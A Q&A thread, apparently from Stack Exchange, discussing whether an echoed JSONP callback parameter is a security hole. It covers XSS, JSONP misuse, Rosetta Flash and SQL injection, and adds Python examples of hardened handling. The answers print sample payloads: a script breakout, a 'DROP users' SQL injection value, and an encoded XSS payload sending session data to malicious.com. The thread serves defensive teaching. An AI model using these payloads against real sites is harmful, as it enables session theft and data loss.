53

Someone reported a bug on my site that I don't really consider an issue. My site has a URL akin to this:

www.site.com/ajax/ads.asp?callback=[text injection]

So the filetype is application/json, and I don't see how that can affect the security of the site.

His point of contention was that it can bypass crossdomain.xml if someone visits a page with this in it:

<script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script>

I did a search for this but couldn't really find any information that says what he is saying is true. I need someone to tell me how serious this is, if I really need to go through my scripts to fix every instance of this bug.

Andrew Hoffman
Daniel
    @JustinLardinois [Sounds like](https://www.google.com.au/search?hl=en&q=crossdomain.xml&gws_rd=ssl) an [Adobe](http://www.adobe.com/devnet/articles/crossdomain_policy_file_spec.html) [policy file](http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html) used by their plugins (Flash, Reader, etc.). – Bob Dec 14 '14 at 22:27
  • @user1203028 Do you echo the callback value in the first bytes of the response? – Lucas NN Dec 15 '14 at 14:56
  • What does `ads.asp` serve? Does it contain any information relating to the user currently logged into `site.com`? – Ry- Dec 15 '14 at 15:50
  • 4
    Shouldn't that be a [JSONP response](https://en.wikipedia.org/wiki/JSONP) with content-type `application/javascript`? What data does the JSON contain, and what exactly happens to the `callback` parameter value? – Bergi Dec 15 '14 at 16:26
  • 14
    Here is a good example I saw: [Opera now recommends Firefox or Chrome for Windows](http://www.opera.com/download/guide/?ver=now%20recommends%20Firefox%20or%20Chrome) – Himal Dec 16 '14 at 01:10
  • 5
    Golden rule: Never trust user input. – John Dec 16 '14 at 20:34
  • How "directly" are you injecting it? What happens if the query string contains an HTML tag? – Random832 Dec 16 '14 at 20:50
  • @Andrew Given that the file type is `application/json`, I'm not sure this qualifies as injecting values into HTML. – Ajedi32 Dec 16 '14 at 21:24
  • @Ajedi32 Not enough info provided, but Lie Ryan's accepted answer assumed using the text directly in the markup. Either way it's still the DOM. – Andrew Hoffman Dec 16 '14 at 22:39
  • If the `callback=[text injection]` text is only being echoed back to the browser of the user who issued the request, I don't see an issue. If it is being stored and possibly sent to other people's browsers, *then* it is a security risk. – Tom Robinson Dec 17 '14 at 00:36
  • @Himal Saved http://web.archive.org/web/20141222064837/http://www.opera.com/download/guide/?ver=now%20recommends%20Firefox%20or%20Chrome – Cole Tobin Dec 22 '14 at 06:49

6 Answers

57

Plaintext injection is an issue. Say you have a page template that looks like this:

Hi <name>,

Blah blah blah.

And you can inject from the URL.

An attacker can construct an email with a link to www.example.com/ajax/ads.asp?name=Foo%2C+you+have+the+wrong+version+Flash+plugin%2C+our+company+policy+requires+that+you+use+version+vul.ne.rabl.e.%0D%0A%0D%0AHi%020Foo (which could also be minified).

This will make your page look like:

Hi Foo, you have the wrong version Flash plugin, our company policy requires that you use version vul.ne.rabl.e.

Hi Foo,

Blah blah blah.

The message looks like it comes from your site, and since your users trust your site, they will likely believe the instructions that "you" have given.

TRiG
Lie Ryan
  • Can you please explain how is this a threat? – A.L Dec 15 '14 at 19:07
  • 6
    @A.L Social Engineering. Like phishing – Canadian Luke Dec 15 '14 at 19:11
  • 3
    @CanadianLuke Like replacing the content of the site with a fake form? – A.L Dec 15 '14 at 19:13
  • 3
    @A.L That's one way to do it. But the point is, it is making the user trust the vulnerable site's information to be true and accurate; I've seen many "fake" Adobe Flash player installs that bring lots of "additional features", or viruses, in – Canadian Luke Dec 15 '14 at 19:21
  • @CanadianLuke If the script is only inserting plaintext with a text node, then the phisher can't inject a link. Of course, the phisher could show a URL for the user to paste (it must be more secure if they're asking me to paste it xD) – aebabis Dec 15 '14 at 23:42
  • 2
    @acbabis: you don't need links to do social engineering. Social engineering exploits humans and trust. A lot of people now know to double-check suspicious emails on the website, but if you have a vulnerable website itself, then things become really hairy. – Lie Ryan Dec 16 '14 at 00:48
  • 1
    I still don't get how it's a security issue to let a user run whatever JS he wants... JS happens on the user end... Is he hacking himself? Unless a hacker has access to your web server, how is he injecting anything into other users' pages? – Doug Cassidy Jul 19 '15 at 00:56
44

Cross site scripting is not a threat to the integrity of your web server. Rather, the problem is that an attacker can craft a site.com URL that will execute arbitrary JavaScript. If your users trust your site and allow it to do whatever it wants, this could be a major security hole.

user2752467
  • 29
    +1 it's not your webserver that's at risk - it's your customers and your reputation. – Grant Dec 14 '14 at 22:25
23

Imagine if the injected text was:

"></script><script>alert("hi");"

which would make it look like this:

<script src="http://www.site.com/ajax/ads.asp?callback="></script><script>alert("hi");""></script>

Then, you have a working custom script that can do anything it wants in the page.

jfriend00
  • 2
    Hmm, that would not affect my site, since alert('hi') is executed on page where – Daniel Dec 14 '14 at 21:29
  • 24
    The point is the attacker could have whatever code they wanted executing in your page. If there was any secure data in that page (passwords, other data, etc...) the inserted script could have full access to that data, including the ability to send it off to other servers. – jfriend00 Dec 14 '14 at 22:16
  • 1
    I downvoted this. My understanding of the OP's question is that `` is what would be included on *the attacker's* site in order to exploit the vulnerability (if it is indeed possible to exploit). Not that his site would generate that code. – user253751 Dec 17 '14 at 02:22
2

His point of contention was that it can bypass crossdomain policies if someone visits a page with this in it:

<script src=www.site.com/ajax/ads.asp?callback=[some javascript]></script>

Yes, he's right. But that doesn't seem to be a security hole; instead, it looks like a feature. This technique of circumventing the same-origin policy is called JSONP (and is very well documented).

However, there are some catches:

  • The correct content-type for JSONP responses is application/javascript, as they are executable scripts. It's no longer plain JSON.
  • If you don't know of JSONP or how it works, it's suspicious that you're using it. Whether this is a serious bug depends on what you are using it for:
  • JSONP can be exploited, as this is its nature. Make sure that you are not sending any confidential data, only such information that you want to be publicly accessible.
    Make sure to treat any requests for JSONP resources as if they had no credentials.
Bergi
2

There is an attack that uses this exact attack vector, called Rosetta Flash (CVE-2014-4671).

As explained on the Rosetta Flash page, the vulnerability is that:

  1. With Flash, a SWF file can perform cookie-carrying GET and POST requests to the domain that hosts it, with no crossdomain.xml check. This is why allowing users to upload a SWF file on a sensitive domain is dangerous: by uploading a carefully crafted SWF, an attacker can make the victim perform requests that have side effects and exfiltrate sensitive data to an external, attacker-controlled, domain.

  2. JSONP, by design, allows an attacker to control the first bytes of the output of an endpoint by specifying the callback parameter in the request URL.

  3. SWF files can be embedded on an attacker-controlled domain using a Content-Type forcing <object> tag, and will be executed as Flash as long as the content looks like a valid Flash file.

This specific vulnerability has been mitigated by an update to Flash Player, but older versions are still vulnerable, and this same technique could conceivably be used to attack other systems.

Generalizing from this specific vulnerability: whenever possible it is best to not allow an attacker to control the first few bytes of any response you send, since that is the part "helpfully" used by browsers and other clients to sniff your content type, and browsers have been known to override Content-Type headers based on sniffed content in the past.

Daniel Pryden
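A JSONP handler that applies the points from Bergi's answer (identifier-only callback, application/javascript, no reliance on credentials) and Daniel Pryden's answer (the caller must not control the first bytes of the response). This is an added example, not code from the thread or from the asker's ads.asp; the function names, the `/**/` prefix convention and the sample ad payload are my own assumptions.

```python
import json
import re

# A JSONP callback must be a plain JavaScript identifier (dots permitted for
# namespaced names such as "app.cb"). The '"></script><script>alert("hi");"'
# payload from the thread fails this check instead of being echoed.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def unsafe_jsonp(callback, payload):
    """The pattern described in the question: the callback is echoed verbatim
    as the first bytes of a response that is still labelled as JSON."""
    body = callback + "(" + json.dumps(payload) + ")"
    return 200, {"Content-Type": "application/json"}, body


def safe_jsonp(callback, payload):
    """Hardened variant: reject anything but an identifier, serve it as script,
    forbid sniffing, and fix the first bytes of the response ourselves.
    The payload must be public data only: a JSONP endpoint cannot rely on
    cookies for authorisation, because any origin can load it as a script."""
    if not CALLBACK_RE.match(callback) or len(callback) > 64:
        return 400, {"Content-Type": "text/plain; charset=utf-8"}, "invalid callback"
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Cache-Control": "no-store",
    }
    # A leading "/**/" is valid JavaScript and guarantees that byte zero of the
    # response, the part content sniffers look at, is chosen by us.
    body = "/**/" + callback + "(" + json.dumps(payload) + ");"
    return 200, headers, body


if __name__ == "__main__":
    ads = {"ads": [{"id": 1, "text": "constructed sample ad"}]}  # constructed data
    for cb in ("showAds", "app.cb", '"></script><script>alert("hi");"'):
        print(safe_jsonp(cb, ads))
```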
1

I think the OP is focusing on the wrong place by looking at the URL. All GET and POST parameters can be abused, regardless of what they're called. The only relevant code is that which uses this parameter.

For example, you can have an SQL injection vulnerability if you concatenate this parameter on to an SQL query:

db_query("SELECT code FROM callbacks WHERE id = " + param("callback"))

A user could visit:

www.site.com/ajax/ads.asp?callback=0;DROP+users

You have an XSS vulnerability if you're doing something like:

return new Response("Hello " + param("callback"))

A user could visit:

www.site.com/ajax/ads.asp?callback=%3Cscript%3EaddToDom(%27%3Cimg%20src%3D%22http%3A%2F%2Fmalicious.com%2F%3Fdata%3D%27%2BharvestSessionData()%2B%27%22%2F%3E%27)%3C%2Fscript%3E

These are all variations on the same theme: treating all languages as strings, which allows them to be mixed. Other examples are shell injection, eval-based code injection, breaking out of "quotations", etc.

You can also defer these same vulnerabilities if you store the parameter somewhere:

// Escape the parameter when we use it in our SQL
db_query('INSERT INTO callbacks (code) VALUES (:cb)', {'cb': param('callback')})

// But suffer the same problems in a later request
return new Response("Our callbacks include " + db_query("SELECT * FROM callbacks").join(", "))
Warbo
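The three snippets in this answer carried through in Python against an in-memory SQLite table, so both the first-order case (parameter concatenated into the query) and the deferred, second-order case (value stored safely, then concatenated into HTML later) can be run. This is added example code, not the answer's own; the callbacks table, the showAds row and the script payload are constructed.

```python
import html
import sqlite3


def new_db():
    """In-memory stand-in for the callbacks table the answer refers to."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE callbacks (id INTEGER PRIMARY KEY, code TEXT)")
    conn.execute("INSERT INTO callbacks (code) VALUES ('showAds')")  # constructed row
    return conn


def lookup_unsafe(conn, callback):
    """The answer's first snippet: the parameter is concatenated into the SQL.
    sqlite3's execute() refuses stacked statements, so the demo uses the
    tautology "0 OR 1=1" rather than the thread's "0;DROP users"."""
    sql = "SELECT code FROM callbacks WHERE id = " + callback
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, callback):
    """Same query with a bound parameter: the value can only ever be data."""
    rows = conn.execute("SELECT code FROM callbacks WHERE id = ?", (callback,))
    return [row[0] for row in rows]


def store_callback(conn, callback):
    """Parameterised INSERT, as in the answer's last snippet: safe here, but
    the raw value is now stored and will come back in a later request."""
    conn.execute("INSERT INTO callbacks (code) VALUES (?)", (callback,))


def render_unsafe(conn):
    """Later request: stored values concatenated into HTML (second-order XSS)."""
    rows = [row[0] for row in conn.execute("SELECT code FROM callbacks ORDER BY id")]
    return "Our callbacks include " + ", ".join(rows)


def render_safe(conn):
    """Escape for the language being emitted (HTML) at the point of use."""
    rows = [row[0] for row in conn.execute("SELECT code FROM callbacks ORDER BY id")]
    return "Our callbacks include " + ", ".join(html.escape(r) for r in rows)


def second_order_demo():
    """Store a constructed script payload safely, then render it both ways."""
    conn = new_db()
    store_callback(conn, '<script>alert("hi")</script>')  # constructed payload
    return render_unsafe(conn), render_safe(conn)
```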